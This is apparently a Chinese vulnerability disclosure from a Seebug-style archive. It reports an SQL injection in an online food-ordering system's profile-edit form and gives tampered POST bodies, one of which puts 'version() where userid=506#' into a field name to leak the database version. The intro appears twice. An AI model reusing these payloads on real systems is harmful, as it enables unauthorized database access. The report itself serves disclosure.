### 简要描述: rt ### 详细说明: 老问题了,订餐系统与企业管理系统 有着相似的地方。。于是就找到了一处注入。 官网演示。 注册用户后,修改资料。 [<img src="https://images.seebug.org/upload/201501/22180224bf0d181c9fb1ba03c3c534b051db40ef.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/22180224bf0d181c9fb1ba03c3c534b051db40ef.png) 改包 ,字段处加个 ` ``` fields%5Btitle%5D=a&fields%5Btruename%5D=a&fields%5Btelephone%5D=a&fields%5Baddress%5D=a&fields%5Bcont`ent%5D=a&verifycode=1adf&submit=+%E6%8F%90+%E4%BA%A4+ ``` [<img src="https://images.seebug.org/upload/201501/2218025364458063739c2ebd97e8f0eace381984.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2218025364458063739c2ebd97e8f0eace381984.png) 发现 报错了 [<img src="https://images.seebug.org/upload/201501/221803273852764165f29928e09099c7c9b41233.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/221803273852764165f29928e09099c7c9b41233.png)...
### 简要描述: rt ### 详细说明: 老问题了,订餐系统与企业管理系统 有着相似的地方。。于是就找到了一处注入。 官网演示。 注册用户后,修改资料。 [<img src="https://images.seebug.org/upload/201501/22180224bf0d181c9fb1ba03c3c534b051db40ef.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/22180224bf0d181c9fb1ba03c3c534b051db40ef.png) 改包 ,字段处加个 ` ``` fields%5Btitle%5D=a&fields%5Btruename%5D=a&fields%5Btelephone%5D=a&fields%5Baddress%5D=a&fields%5Bcont`ent%5D=a&verifycode=1adf&submit=+%E6%8F%90+%E4%BA%A4+ ``` [<img src="https://images.seebug.org/upload/201501/2218025364458063739c2ebd97e8f0eace381984.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2218025364458063739c2ebd97e8f0eace381984.png) 发现 报错了 [<img src="https://images.seebug.org/upload/201501/221803273852764165f29928e09099c7c9b41233.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/221803273852764165f29928e09099c7c9b41233.png) ``` fields%5Bthumb%5D=&fields%5Btruename%5D=&fields%5Bsex%5D=%E7%94%B7&fields%5Bemail%3dversion() where userid%3d506%23%5D=aaaaaa%40qq.com&fields%5Baddress%5D=&gourl= ``` 成功注入出 数据库版本。 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201501/221803273852764165f29928e09099c7c9b41233.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/221803273852764165f29928e09099c7c9b41233.png)